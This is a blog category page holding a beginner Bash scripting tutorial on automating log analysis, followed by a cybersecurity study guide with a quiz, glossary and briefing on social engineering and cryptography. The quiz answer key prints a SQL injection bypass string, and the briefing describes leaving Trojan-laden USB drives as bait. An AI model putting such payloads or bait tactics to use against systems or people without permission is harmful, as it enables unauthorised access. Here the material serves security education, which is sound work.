Category: Linux

  • Bash Scripting: From Beginner to Automation Wizard

    Bash Scripting: From Beginner to Automation Wizard

    The source provides a comprehensive Bash scripting tutorial for beginners, focusing on automating repetitive tasks typically encountered in DevOps and system administration roles. It begins by explaining fundamental concepts such as the command line interface (CLI), shell, and Bash, differentiating them from graphical user interfaces (GUIs). The tutorial then transitions into practical application, guiding the user through the process of creating and executing Bash scripts, including details like shebang statements and making scripts executable. Key elements of scripting are introduced, such as using variables for reusability, implementing loops for dynamic processing, and incorporating conditional statements for intelligent analysis. Finally, the source illustrates how to redirect output to files for reporting and provides various real-world use cases for Bash scripting beyond the immediate example.

    Bash Scripting Fundamentals and Automation

    Bash scripting is a powerful way to automate tasks and streamline operations on your computer, particularly for Linux systems. It involves writing programs, called bash scripts, that consist of a series of commands to be executed automatically.

    Here are the basics of Bash scripting:

    Understanding the Fundamentals

    • Command Line Interface (CLI) vs. Graphical User Interface (GUI): While a GUI allows you to interact with your computer by clicking icons, the CLI uses typed commands. The CLI is often more powerful and faster, especially for repetitive tasks, such as creating 100 folders with a single command.
    • Shell: On a Linux operating system, the program that runs and interprets these commands is called a shell.
    • Bash (Born Again SHell): Bash is the most common implementation or “flavor” of the shell program for Linux systems. It’s not exclusive to Linux and can be used on other operating systems, but it’s prevalent across many Linux distributions. Bash is not just for running commands; it’s a full programming language that enables automation of tedious and time-consuming manual tasks. This is why “shell scripting” and “bash scripting” are often used interchangeably. Bash offers more advanced features compared to simpler shell flavors like SH.
    • Terminal: A terminal is a graphical window where you type out commands or run scripts that the shell program (like Bash) will execute.

    Why Use Bash Scripting?

    Bash scripting is highly valuable, especially for roles like DevOps, because it:

    • Automates repetitive tasks: What might take hours manually can be completed in seconds with a script. For example, analyzing numerous log files daily.
    • Ensures consistency: The same script is executed every time, reducing human error and ensuring processes are followed precisely.
    • Provides proper error handling: You can program specific error handling logic into your scripts.
    • Serves as documentation: Scripts automatically document the processes or workflows they execute.
    • Saves time and increases efficiency: Engineers can focus on more enjoyable and creative tasks rather than boring, repetitive command entry.

    Setting Up Your Bash Environment

    • If you have Linux, you are already set up.
    • On Mac, Bash is typically installed but may not be the default. You can switch to Bash by typing bash in your terminal.
    • For Windows, the best option is to install Windows Subsystem for Linux (WSL), as it provides a more complete Linux environment and is officially supported by Microsoft.

    Creating and Executing a Bash Script

    A shell script is simply a text file containing Linux commands.

    1. Create the file: Use a command like touch analyze_logs.sh. The .sh extension is a convention for human readability and to help code editors, but it’s not strictly required for execution on Unix/Linux systems.
    2. Add commands: Open the file with a text editor (e.g., Vim or Visual Studio Code) and copy your commands into it.
    3. The Shebang Line (#!): This special first line, typically #!/bin/bash for Bash scripts, tells the system which interpreter should be used to execute the script. This is crucial if the script uses Bash-specific syntax, as it differentiates it from other shell implementations.
    4. Make it executable: Initially, your script won’t have execute permission. You need to add it using chmod +x analyze_logs.sh. Programs like vim or touch are also executables, just like your custom script.
    5. Execute the script: Once executable, run it using ./analyze_logs.sh. The ./ tells the shell to look for the script in the current directory.

    Core Scripting Concepts

    As you develop more complex scripts, you’ll use programming concepts:

    • Variables:
    • Used to store and reuse repeated values, such as directory locations, file names, or error patterns.
    • Defined using VARIABLE_NAME=value (no spaces around the equal sign).
    • Accessed with a dollar sign: $VARIABLE_NAME.
    • Array Variables: Can hold multiple values. Defined as ARRAY_NAME=(value1 value2 value3). Individual elements are accessed using their index (starting from 0): ${ARRAY_NAME}. To iterate over all elements in a loop, use ${ARRAY_NAME[@]}.
    • Command Substitution: Allows you to save the output of a command into a variable. The syntax is VARIABLE_NAME=$(command). For example, log_files=$(find . -maxdepth 1 -mtime -1 -name “*.log”) saves a list of recently modified log files into the log_files variable.
    • Loops (for): Enable dynamic logic to process multiple items without hardcoding or repeating code. They iterate through a list (like files in a directory or elements in an array) and execute the same logic for each item. The basic syntax is:
    • for item in list_of_items; do
    • # commands to execute for each item
    • done
    • This allows for much cleaner and more reusable code.
    • Conditionals (if): Allow you to program logic that executes only when certain conditions are met. For example, checking if an error count exceeds a specific threshold. The basic syntax is:
    • if [ condition ]; then
    • # commands to execute if condition is true
    • fi
    • Conditions are placed within square brackets [].

    Managing Output

    • Echo Command: Used to print information or variables to the terminal.
    • Use echo -e “Text with\nNewlines” with the -e flag to interpret backslash escape sequences like \n for newlines.
    • Output Redirection:
    • Overwrite: Use > to direct the output of a command to a file, overwriting its existing contents (e.g., command > file.txt).
    • Append: Use >> to direct the output of a command to a file, appending it to existing contents (e.g., command >> file.txt). This is useful for building reports over time.

    By understanding these basic concepts, you can start automating many manual, repetitive, and time-consuming tasks, significantly boosting your efficiency and consistency.

    The Power of the Command Line Interface

    The Command Line Interface (CLI) is an alternative way to interact with your computer, distinct from the Graphical User Interface (GUI).

    Here’s a discussion of the Command Line Interface:

    • Definition and Interaction: Unlike a GUI where you perform tasks by clicking icons and visual elements, the CLI involves running commands typed out to instruct the computer. This includes actions such as creating folders, copying or moving files, and opening applications.
    • Power and Speed: The CLI is described as much more powerful and faster than a GUI. For example, if you need to create 100 folders, the CLI allows you to do this all at once with a single command, whereas in a GUI, you would have to create each folder individually.
    • Underlying Program: On a Linux operating system, the program responsible for running and interpreting these typed commands is called a shell. Bash (Born Again SHell) is the most common implementation or “flavor” of a shell program for Linux systems, effectively acting as the specific interpreter for commands typed in the CLI.
    • Terminal: A terminal is the graphical window where you type out your commands or run scripts that a shell program, like Bash, will then execute.

    Bash Scripting for Task Automation and Efficiency

    Automating repetitive tasks is a core benefit and primary purpose of Bash scripting, significantly enhancing efficiency and consistency in various computing operations, particularly on Linux systems.

    Here’s a discussion on automating repetitive tasks using Bash scripting:

    • Core Purpose of Bash Scripting: Bash is not merely a program for running commands; it’s a full programming language that enables you to automate tasks that would otherwise be tedious and very time-consuming to do manually. This is why “shell scripting” and “bash scripting” are often used interchangeably when discussing automation.
    • Transformative Impact on Efficiency: What might take hours to complete manually can be finished in seconds with a script. For instance, a senior engineer showed how to write a shell script to automate tasks, allowing completion in seconds what used to take half a day. This dramatically saves time and increases efficiency, freeing engineers to focus on more creative and enjoyable tasks instead of repetitive command entry.
    • Addressing Tedious and Repetitive Work: Many roles, such as DevOps engineers or software engineers, involve a lot of repetitive work. For example, manually checking log files daily can take 30 to 45 minutes, depending on the number of files, making it a waste of an engineer’s time due to repetitive command entry. Instead, with a shell script, you can save these steps and commands and simply execute them all in one go.
    • Benefits Beyond Speed: Automating tasks with Bash scripting offers several key advantages:
    • Ensures Consistency: The same script gets executed every time, eliminating reliance on memorizing command sequences and reducing human error.
    • Proper Error Handling: You can program in specific error handling logic within your scripts.
    • Serves as Documentation: Scripts automatically document the processes or workflows they execute, aligning with the “everything as code” concept in DevOps.
    • Dynamic Logic and Reusability: Scripts can incorporate dynamic logic using variables and loops, allowing them to process multiple items (like log files or error patterns) without hardcoding values or repeating code. This makes the code cleaner, more reusable, and more extendable.
    • Practical Use Cases for Automation: Bash scripting can automate a wide range of tasks:
    • Log Analysis: Regularly scanning server log directories for issues, filtering specific error types (e.g., error, fatal, critical), counting occurrences, and even generating reports. A script can be designed to analyze only logs modified within the last 24 hours to focus on recent changes.
    • Local Development Environment Setup: For new team members, a script can quickly set up a developer’s local machine with all necessary tools, configurations, required software versions, environment variables, Git repositories, and test databases. This can save hours or days of manual setup and troubleshooting while ensuring consistent environments across developers.
    • Log Management and Cleanup: Scripts can scan server log directories daily, compress older logs, and delete the oldest ones based on space usage. They can also include logic to email administrators when disk space runs low or to keep important error logs longer than routine logs, preventing server crashes due to full disks.
    • Custom Alerts: Scripts can incorporate conditional logic to alert users if specific criteria are met, such as detecting more than 10 critical errors in any log file, providing actionable results.

    By defining the logic once in a script, it can be executed daily with a single command, providing much more actionable results in milliseconds compared to manual command execution. These scripts can be shared and collaborated on within teams, just like application code, making jobs more enjoyable and efficient.

    Bash Script Optimization: Flexible, Robust, Reusable, and Efficient

    Script optimization in Bash scripting focuses on making scripts more flexible, robust, reusable, and efficient by avoiding hardcoding and repetitive code. This allows for the creation of powerful automation tools that can adapt to changing conditions and process large amounts of data dynamically.

    Here are key aspects of script optimization:

    1. Avoiding Hardcoding with Variables

    Initially, a script might hardcode specific file names or directory locations, making it inflexible and prone to breaking if files are moved or the script is run on a different machine.

    • Problem: Hardcoding values like /users/nat/logs/application.log means if the log directory changes, almost every line of the script needs to be rewritten.
    • Solution: Use variables to store and reuse these repeated values, such as directory locations, file names, or even error patterns.
    • Syntax: VARIABLE_NAME=value (no spaces around the equal sign).
    • Accessing: Use a dollar sign: $VARIABLE_NAME.
    • Benefit: If a value changes (e.g., log directory), you only need to adjust it once at the beginning of the script, making the code much more optimized, reusable, and robust.
    • Array Variables: For values that consist of multiple options (e.g., error, fatal, critical error patterns), array variables can hold multiple values.
    • Syntax: ARRAY_NAME=(value1 value2 value3).
    • Accessing Elements: Elements are accessed by their index (starting from 0): ${ARRAY_NAME}. To expand all elements for iteration in a loop, use ${ARRAY_NAME[@]}.
    • Benefit: This allows for dynamic handling of various patterns without hardcoding each one.

    2. Capturing Command Output with Command Substitution

    Often, the output of one command needs to be used as input or data for subsequent operations within the script.

    • Solution: Command substitution allows you to save the result of a command’s execution directly into a variable.
    • Syntax: VARIABLE_NAME=$(command).
    • Example: log_files=$(find . -maxdepth 1 -mtime -1 -name “*.log”) will save a list of log files modified in the last 24 hours into the log_files variable.
    • Benefit: This enables scripts to dynamically determine and work with sets of files or data based on live system conditions, rather than having to manually identify them.

    3. Implementing Dynamic Logic with Loops

    When the same set of operations needs to be performed on multiple items (e.g., all log files in a directory or all defined error patterns), loops are essential for optimization.

    • Problem: Manually repeating code for each file or each error pattern is tedious, error-prone, and not scalable.
    • Solution: Use for loops to iterate through a list of items (like the log_files array or error_patterns array) and execute the same logic for each.
    • Basic Syntax:
    • for item in list_of_items; do
    • # commands to execute for each item
    • done
    • Nested Loops: Loops can be nested (e.g., iterating through each log file, and then for each file, iterating through each error pattern) to handle complex, multi-dimensional tasks efficiently.
    • Benefit: Loops make the code much cleaner, more reusable, and more extendable. They allow a few lines of code to process an arbitrary number of files or patterns dynamically, eliminating manual checks and repetitive code blocks.

    4. Adding Decision-Making with Conditionals

    Scripts often need to perform different actions based on specific conditions or thresholds.

    • Solution: Use if conditionals to program logic that executes only when certain criteria are met.
    • Syntax:
    • if [ condition ]; then
    • # commands to execute if condition is true
    • fi
    • Example: Checking if the error_count found in a log file is greater than 10 and then printing an “action required” warning.
    • Benefit: Conditionals allow the script to provide intelligent analysis and immediate alerts, guiding the user to urgent issues without manual review of entire reports. This saves time and helps prioritize actions.

    5. Managing Output with Redirection

    Controlling where the script’s output goes is crucial for readability and subsequent analysis.

    • Problem: Default output to the terminal can be overwhelming for large reports and doesn’t provide a permanent record.
    • Solution: Use output redirection to direct command output to a file.
    • Overwrite: > (e.g., command > file.txt) will create the file if it doesn’t exist or overwrite its content if it does.
    • Append: >> (e.g., command >> file.txt) will append the output to the end of an existing file or create the file if it doesn’t exist. This is useful for building up a report over time.
    • Benefit: This allows saving analysis into report files for later review, sharing, and better organization, while still allowing for a final summary message to be displayed on the terminal.

    By applying these optimization techniques, Bash scripts evolve from simple command execution lists into powerful, flexible, and automated programs that significantly enhance efficiency and consistency for repetitive and time-consuming tasks.

    CLI and Bash Scripting: Automation and Efficiency

    The Command Line Interface (CLI) and Bash scripting offer numerous practical use cases, primarily centered around automating repetitive and time-consuming tasks to enhance efficiency, consistency, and reliability.

    Here are some practical applications:

    • Automating Log Analysis and Monitoring
    • Daily Log Checks: Instead of manually checking server log files daily, which can take 30 to 45 minutes depending on the number of files and involves repetitive command entry, a Bash script can automate this process entirely.
    • Filtering and Counting Errors: Scripts can be designed to scan logs for specific error patterns (e.g., “error,” “fatal,” “critical”), count their occurrences, and even display the actual error messages.
    • Focusing on Recent Changes: To avoid re-analyzing old data, scripts can filter for log files modified within a specific timeframe, such as the last 24 hours, ensuring only relevant logs are processed.
    • Generating Reports: The analysis output can be redirected and saved into a report file (e.g., log_analysis_report.txt), making it easy to reference, share, or store for later review.
    • Conditional Alerts: Scripts can incorporate logic to alert users if specific conditions are met, such as detecting more than 10 critical or fatal errors in any log file. This provides immediate warnings and helps prioritize issues, especially when dealing with long reports.
    • Local Development Environment Setup
    • For new team members, a script can quickly set up a developer’s local machine. This includes installing necessary tools, configuring environment variables, cloning relevant Git repositories, creating test databases, and ensuring all required software versions are in place.
    • This automation saves hours or even days of manual setup and troubleshooting, while also ensuring that every developer has a consistent and identical environment.
    • Server Log Management and Cleanup
    • Scripts can be written to scan server log directories daily.
    • They can compress older logs and delete the oldest ones based on disk space usage, preventing servers from crashing due to full disks.
    • Advanced logic can be added to email administrators when disk space runs low or to preserve important error logs for longer periods than routine logs.
    • Mass Operations and Dynamic Processing
    • The CLI’s inherent power allows for creating numerous files or folders with a single command, which would be tedious in a GUI.
    • Bash scripts can dynamically process multiple items using loops (e.g., iterating through all log files in a directory or all defined error patterns), making the code cleaner, more reusable, and more extendable without hardcoding values.

    These use cases highlight how Bash scripting transforms otherwise tedious, repetitive, and time-consuming manual operations into efficient, consistent, and automated workflows, freeing engineers to focus on more complex and creative tasks.

    Bash Scripting Tutorial for Beginners

    By Amjad Izhar
    Contact: amjad.izhar@gmail.com
    https://amjadizhar.blog

  • Ethical Hacking and Penetration Testing with Kali Linux

    Ethical Hacking and Penetration Testing with Kali Linux

    The provided sources offer a comprehensive overview of cybersecurity in 2024. They explore foundational and advanced concepts crucial for aspiring cybersecurity professionals, including cryptography, risk management, security technologies, and ethical hacking methodologies. The texts detail various types of hackers, their motivations, and the ethical responsibilities of cybersecurity experts. Furthermore, the sources introduce essential tools like Nmap, Metasploit, and Wireshark, explaining their practical applications in vulnerability assessment and penetration testing. Finally, they discuss common cyber threats such as phishing, SQL injection, and cross-site scripting, alongside preventative measures and career paths in the cybersecurity field.

    Cybersecurity Fundamentals Study Guide

    Quiz

    1. Explain the concept of social engineering in the context of cybersecurity. Provide an example of a common social engineering tactic and why it is often successful.
    2. Describe the purpose of encryption in cybersecurity. Differentiate between symmetric and asymmetric encryption, highlighting a key advantage of each.
    3. What is a brute-force attack, and why can it be time-consuming? Briefly describe two other methods of cryptanalysis besides brute force.
    4. Explain the difference between a white hat hacker and a black hat hacker. What is the primary role of an ethical hacker within an organization?
    5. Outline the five phases of penetration testing. Which phase is considered the most crucial for a successful penetration test, and why?
    6. Define SQL injection and explain why it is a significant web application vulnerability. Provide a simple example of how an attacker might attempt an SQL injection.
    7. What is a Denial-of-Service (DoS) attack? How does a Distributed Denial-of-Service (DDoS) attack differ from a DoS attack, and why is it generally more challenging to mitigate?
    8. Explain what a botnet is and how it is typically created. What are botnets commonly used for in cyberattacks?
    9. Describe the main difference between a virus and a Trojan horse. Give one example of the negative impact each can have on a computer system.
    10. What is Wireshark, and why is it a valuable tool for network analysis in cybersecurity? Briefly explain what kind of information Wireshark allows a user to see.

    Quiz Answer Key

    1. Social engineering involves manipulating individuals into divulging confidential information or performing actions that compromise security. A common tactic is phishing, where fraudulent emails from seemingly trustworthy sources trick users into revealing passwords or clicking malicious links. This is often successful because it exploits human psychology, such as trust and urgency.
    2. Encryption transforms data into an unreadable format (ciphertext) to protect its confidentiality. Symmetric encryption uses the same key for encryption and decryption, offering speed. Asymmetric encryption uses separate public and private keys, simplifying secure key exchange.
    3. A brute-force attack involves trying every possible key combination to decrypt data, which can take a significant amount of time due to the vast number of potential keys. Two other cryptanalysis methods are dictionary attacks (using a list of common passwords) and rainbow table attacks (using pre-computed hash values).
    4. A white hat hacker (ethical hacker) works to find security vulnerabilities in systems with permission to improve security, while a black hat hacker exploits vulnerabilities for malicious purposes. The primary role of an ethical hacker is to identify weaknesses and recommend solutions to protect an organization’s assets.
    5. The five phases of penetration testing are reconnaissance (information gathering), scanning, exploitation, post-exploitation, and reporting. Reconnaissance is considered the most crucial because the quality and breadth of information gathered directly impact the effectiveness of subsequent phases by informing the choice of tools and attack vectors.
    6. SQL injection is a vulnerability that allows attackers to insert malicious SQL code into an application’s database queries. It’s significant because it can lead to data breaches, unauthorized access, and data manipulation. An attacker might try entering ‘ OR ‘1’=’1 into a username field to bypass authentication.
    7. A Denial-of-Service (DoS) attack aims to disrupt a service by overwhelming it with traffic from a single source, making it unavailable to legitimate users. A Distributed Denial-of-Service (DDoS) attack uses numerous compromised devices (bots) to flood the target, making it harder to block the attack source and increasing the volume of malicious traffic.
    8. A botnet is a network of compromised devices (bots) infected with malware and controlled remotely by a single attacker (bot herder). Botnets are typically created by exploiting vulnerabilities or using social engineering to spread malware. They are commonly used for DDoS attacks, spam distribution, and data theft.
    9. A virus is a malicious code that attaches itself to a host program and replicates by spreading to other programs, often causing system damage or data corruption. A Trojan horse disguises itself as legitimate software but contains hidden malicious functionality, such as creating backdoors for unauthorized access or stealing data.
    10. Wireshark is a network protocol analyzer that captures network packets in real time and displays them in a human-readable format. It is valuable for cybersecurity as it allows users to examine network traffic, identify security issues, troubleshoot network problems, and understand communication protocols at a detailed level, including source and destination IPs, protocols used, and data content.

    Essay Format Questions

    1. Discuss the evolving landscape of cyber threats and the increasing importance of ethical hacking in mitigating these risks. Provide specific examples of how ethical hacking methodologies can be applied to different types of cyber threats.
    2. Compare and contrast different types of social engineering attacks, analyzing the psychological principles that attackers exploit. Evaluate the effectiveness of various countermeasures that organizations and individuals can implement to defend against these attacks.
    3. Analyze the strengths and weaknesses of different encryption methods (symmetric vs. asymmetric) and cryptanalysis techniques. Discuss scenarios where specific encryption algorithms and cryptanalysis approaches are most effective or vulnerable.
    4. Evaluate the significance of penetration testing in an organization’s cybersecurity strategy. Discuss the different phases of a penetration test and the critical factors that contribute to its success in identifying and addressing vulnerabilities.
    5. Examine the technical mechanisms and impacts of Denial-of-Service and Distributed Denial-of-Service attacks. Discuss various strategies and technologies that organizations can employ to prevent and mitigate these types of attacks.

    Glossary of Key Terms

    • Academic Qualifications: Formal certifications and degrees obtained through educational institutions.
    • Algorithm: A step-by-step procedure or set of rules used to solve a problem or perform a computation.
    • Anonymization: The process of removing personally identifiable information from data to protect privacy.
    • Antivirus: Software designed to detect and remove malicious software (malware) like viruses and Trojans.
    • API Token: A unique identifier used to authenticate an application or user accessing an Application Programming Interface (API).
    • ARP Spoofing: A malicious technique where an attacker sends falsified Address Resolution Protocol (ARP) messages over a local area network.
    • Authentication: The process of verifying the identity of a user, device, or process.
    • Authorization: The process of determining what actions a user, device, or process is permitted to perform.
    • Bash Script: A series of commands written in the Bash (Bourne-Again SHell) scripting language, used for automation in Linux and other Unix-like operating systems.
    • Black Hat Hacker: An individual who attempts to gain unauthorized access to computer systems or networks for malicious purposes.
    • Block Cipher: A type of symmetric encryption algorithm that encrypts data in fixed-size blocks.
    • Bot Herder: The individual who controls a botnet.
    • Botnet: A network of compromised computers or devices (bots) controlled remotely by an attacker to perform malicious tasks.
    • Brute Force Attack: A cryptanalysis technique that involves trying every possible key or password until the correct one is found.
    • Buffer Overrun: A vulnerability that occurs when a program writes more data to a buffer than it is allocated to hold, potentially overwriting adjacent memory.
    • Burp Suite: A popular integrated platform used for web application security testing.
    • Caesar Cipher: A simple substitution cipher where each letter in the plaintext is shifted a certain number of places down the alphabet.
    • Capturing Data: The act of intercepting and recording network traffic or other digital information.
    • Certified Ethical Hacker (CEH): An individual who has the skills and knowledge to look for weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker, but in a lawful and legitimate manner.
    • Cipher: The result of encrypting plaintext; also refers to a method of encryption.
    • Ciphertext: Data that has been encrypted and is unreadable without the correct decryption key.
    • Command Line Interface (CLI): A text-based interface used to interact with an operating system or application by typing commands.
    • Content Delivery Network (CDN): A geographically distributed network of proxy servers and their data centers.
    • Cryptography: The art and science of concealing information to make it unreadable to unauthorized individuals.
    • Cryptanalysis: The art of breaking codes and ciphers; analyzing cryptographic systems to reveal hidden information.
    • Cyber Attack: A malicious attempt to gain unauthorized access to a computer system, network, or digital information, typically to disrupt operations, steal data, or cause other harm.
    • Cyber Security: The practice of protecting computer systems, networks, and digital information from theft, damage, disruption, or unauthorized access.
    • Data Breach: A security incident in which sensitive, protected, or confidential data is copied, transmitted, viewed, stolen, or used by an individual unauthorized to do so.
    • Data Encryption Standard (DES): A symmetric-key algorithm for encrypting digital data.
    • Decryption: The process of converting ciphertext back into its original plaintext using the correct key.
    • Deep Web: Parts of the World Wide Web whose contents are not indexed by standard search engines.
    • Denial of Service (DoS) Attack: An attack that aims to make a computer resource unavailable to its intended users.
    • Dictionary Attack: A cryptanalysis technique that tries to crack passwords by testing words from a dictionary.
    • Digital Signature: A mathematical technique used to validate the authenticity and integrity of a message or document.
    • Distributed Denial of Service (DDoS) Attack: A type of DoS attack where the malicious traffic originates from multiple compromised devices.
    • DNS Enumeration: The process of locating DNS servers and records for a specific domain.
    • Email Spoofing: The forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source.
    • Enigma: A famous cryptographic cipher device used by Nazi Germany during World War II.
    • Encryption: The process of converting data into an unreadable format (ciphertext) to protect its confidentiality.
    • Exploit: A piece of software, a chunk of data, or a sequence of commands that takes advantage of a vulnerability to cause unintended or unanticipated behavior on computer software, hardware, or something electronic.
    • Firewall: A network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules.
    • Fishing (Phishing): A type of social engineering attack where attackers send fraudulent messages designed to trick individuals into revealing sensitive information.
    • Forensic Analysis: The process of examining digital evidence to understand security incidents and gather information for legal or investigative purposes.
    • Hash Function: A mathematical function that converts an input of arbitrary size into an output of a fixed size (the hash value).
    • Hash Value: The output of a hash function; often used to verify data integrity.
    • Hping3: A command-line oriented TCP/IP packet generator and analyzer.
    • HTTPS: A secure version of the HTTP protocol that uses encryption for secure communication over the internet.
    • Hypertext Markup Language (HTML): The standard markup language for creating web pages.
    • Incident Response: The process of handling and managing the aftermath of a security incident.
    • Initialization Vector (IV): A block of bits used in cryptographic algorithms to randomize the encryption and decryption process.
    • Internet Protocol (IP) Address: A numerical label assigned to each device connected to a computer network that uses the Internet Protocol for communication.
    • John the Ripper: A popular open-source password security auditing and password recovery tool.
    • Kali Linux: A Debian-based Linux distribution designed for digital forensics and penetration testing.
    • Key: A piece of information used in cryptography to encrypt or decrypt data.
    • Key Generation: The process of creating cryptographic keys.
    • Localhost (LHOST): The IP address of the local computer (typically 127.0.0.1).
    • Macro Virus: A computer virus written in a macro language embedded in a software application.
    • Malicious Hackers (Black Hats): Individuals who exploit vulnerabilities in computer systems or networks for unauthorized or harmful purposes.
    • Malware: Software that is intended to damage or disable computers and computer systems.
    • Man-in-the-Middle (MITM) Attack: An attack where the attacker secretly relays and potentially alters the communications between two parties who believe they are communicating directly with each other.
    • Master Boot Record (MBR): The first sector of a storage device that contains code to boot the operating system.
    • Metasploit: A penetration testing framework that contains a collection of exploits and tools.
    • Network Architecture: The design and structure of a computer network, including its components and their interactions.
    • Network Packet: A small unit of data transmitted over a network.
    • Nikto: An open-source web server scanner that performs comprehensive tests against web servers for multiple types of vulnerabilities.
    • OASSP Broken Web Applications Project: A collection of intentionally vulnerable web applications used for security testing and training.
    • Onion Links: Special URLs used to access hidden services on the Tor network.
    • OpenVAS (Greenbone Vulnerability Manager): A comprehensive vulnerability management system.
    • Operating System (OS): The software that supports a computer’s basic functions, such as scheduling tasks, executing applications, and controlling peripherals.
    • Packet Filtering Firewall: A firewall that controls network access by examining the source and destination addresses, protocols, and ports of network packets.
    • Password Cracking: The process of attempting to recover passwords from stored or transmitted data.
    • Password Policies: A set of rules designed to enhance computer security by encouraging users to employ strong passwords and use them properly.
    • Penetration Testing: A simulated cyberattack performed on a computer system or network to evaluate its security.
    • Payload: The part of an exploit that performs the intended malicious action.
    • Peer-to-Peer (P2P) Model: A decentralized communication model where each node can act as both a client and a server.
    • Phishing: See Fishing.
    • Plaintext: Unencrypted data.
    • Port (Networking): A communication endpoint in a computer’s operating system associated with a specific service or application.
    • Proxy Chains: A tool that forces any TCP connection made by any given application to follow a chain of proxies.
    • Proxy Firewall: A firewall that acts as an intermediary between a network and the internet, handling requests on behalf of client systems.
    • Public Key: A cryptographic key that can be shared with others and is used for encryption or verifying digital signatures.
    • Rainbow Table Attack: A cryptanalysis technique that uses pre-computed tables of hash values to crack passwords.
    • Ransomware: A type of malware that encrypts a victim’s files and demands a ransom payment to restore access.
    • Reconnaissance: The initial phase of a penetration test or attack where information about the target is gathered.
    • Reverse Engineering: The process of analyzing a hardware or software system to understand its design and functionality.
    • Reverse TCP Connection: A type of network connection where the target machine initiates the connection back to the attacker’s machine.
    • Risk Assessment: The process of identifying, analyzing, and evaluating potential risks.
    • Root Access: The highest level of access control in Unix-like operating systems.
    • Router: A networking device that forwards data packets between computer networks.
    • RSA: A public-key cryptosystem that is widely used for secure data transmission.
    • Scanning (Penetration Testing): The phase of a penetration test where tools are used to identify open ports, services, and vulnerabilities on the target system.
    • Security Auditing: A systematic evaluation of the security of an organization’s information systems.
    • Server Message Block (SMB): A network file-sharing protocol.
    • Shell: A command-line interpreter that provides an interface to the operating system.
    • Shellcode: A small piece of code used as the payload in the exploitation of software vulnerabilities.
    • Simply Learn: (In the context of the source) An educational platform or website.
    • Sniffing: The process of monitoring and capturing network traffic.
    • Social Engineering: The manipulation of individuals to perform actions or divulge confidential information.
    • SQL (Structured Query Language): A domain-specific language used in programming and designed for managing data held in a relational database management system.
    • SQL Injection: A code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution.
    • SSL Handshake: The process that initiates a secure communication session between a client and a server using the Secure Sockets Layer (SSL) or Transport Layer Security (TLS) protocol.
    • Stateful Inspection Firewall: A firewall that keeps track of the state of network connections and makes decisions based on the context of these connections.
    • Subdomain: A domain that is part of a larger domain.
    • Substitution Cipher: A method of encryption by which units of plaintext are replaced with ciphertext according to a regular system.
    • Sudo: A program that allows a permitted user to execute a command as the superuser or another user, as specified by the security policy.
    • Superuser: A user with administrative privileges (e.g., root in Linux).
    • Symmetric Encryption: An encryption method in which the same key is used for both encryption and decryption.
    • SYN Packet: A type of TCP packet used to initiate a connection.
    • Target URI: The specific Uniform Resource Identifier (path) on a server that is being targeted by an attack.
    • TCP/IP: The suite of communication protocols used to interconnect network devices on the Internet.
    • Tor Browser: A web browser designed for anonymity and privacy, using the Tor network.
    • Trojan Horse: A type of malware that appears to be legitimate software but performs malicious actions when run.
    • Uncertified Websites: Websites that do not have valid security certificates, potentially indicating a risk.
    • Vulnerability: A weakness in a system that can be exploited by a threat.
    • Vulnerability Assessment: The process of identifying and quantifying security vulnerabilities in a system.
    • Vulnerability Scanner: An automated tool used to identify potential vulnerabilities in computer systems and networks.
    • VPN (Virtual Private Network): A network that extends a private network across a public network, and enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network.
    • Web Server: A computer system that serves web pages and related content to clients.
    • White Hat Hacker (Ethical Hacker): A security expert who uses hacking skills to identify security vulnerabilities in systems with the permission of the owner, with the goal of improving security.
    • Wi-Fi Hacking Tools: Software and techniques used to exploit vulnerabilities in wireless networks.
    • Wireshark: A free and open-source packet analyzer used for network troubleshooting and analysis.
    • WPScan: A free, non-commercial vulnerability scanner for WordPress websites.
    • Zenmap: The official Nmap Security Scanner GUI.

    Detailed Briefing Document: Review of Cyber Security and Ethical Hacking Concepts

    Introduction:

    This briefing document summarizes the main themes, important ideas, and facts presented in the provided source material (“01.pdf”). The document covers a range of cybersecurity topics, from social engineering attacks and cryptography to ethical hacking methodologies, network security measures, malware, and practical demonstrations of penetration testing using tools like Kali Linux. Quotes from the original source are included to highlight key concepts.

    1. Social Engineering Attacks:

    The source emphasizes the human element as a significant vulnerability in security. Attackers often exploit natural human tendencies like curiosity and greed to gain access to systems or information.

    • Exploiting Trust: Attackers may pose as legitimate entities to elicit sensitive information. “if a person can interact with you let’s say they’re trying to take a survey and they approach you for a feedback on a particular product that you have been utilizing and they ask you these questions you wouldn’t think twice before giving those answers as long as the request sounds legitimate to us we are able to justify that request we do answer those queries so it’s upon us to verify the authenticity of the request coming in before we answer it.”
    • Phishing: This involves fraudulent emails appearing from trusted sources. “fishing as discussed would be fraudulent emails which appear to be coming from a trusted source so email spoofing comes into mind fake websites and so on so forth.”
    • Exploiting Curiosity: Leaving infected devices like USB drives in public places can lure unsuspecting individuals. “there’s so many physical attacks where hackers just keep pen drives lying around in a parking lot now this is a open generic attack whoever falls victim will fall victim so if I just throw around a few USBs in the parking lot obviously with Trojans implemented on them some people who are curious or who are looking for a couple of freebies might take up those pen drives plug them in their computers to see what data is on the pen drives at the same time once they plug in there those pen drives on their computers the virus or the Trojan would get infected and cause harm to their machine.”
    • Exploiting Greed: Scams like Nigerian frauds and fake lotteries prey on individuals’ desire for quick financial gain. “exploiting human greed we just talked about the Nigerian frauds and the lotteryies those kind of attacks the fake money-making gimmicks now basically this is where you prey upon the person’s uh greed kicking in and they clicking on those links in order to uh get that money that has been promised to them in that email.”

    2. Cryptography:

    Encryption is presented as a fundamental mechanism for data privacy and security.

    • Encryption Process: Cryptography involves scrambling data using algorithms to make it unreadable without the correct key. “one of the safest mechanism to keep data private and to keep yourself secure is using encryption now encryption can happen through cryptography what is cryptography cryptography is the art of scrambling data using a particular algorithm so that the data becomes unreadable to the normal user the only person with the key to unscramble that data would be able to unscramble it and make sense out of that data so we’re just making it unreadable or non-readable by using a particular key or a particular algorithm and then we’re going to send the key to the end user the end user using the uh same key would then decrypt that data if anybody compromises that data while it is being sent over the network since it is encrypted they would not be able to read it.”
    • Cipher and Decryption: Encrypted data is called a cipher. Decryption is the reverse process using the key. The source illustrates a simple substitution cipher. “the encrypted message is also known as a cipher the decryption is just the other way around where you know the key now and you can now figure out what that e correspondent to by going back three characters in the alphabet.”
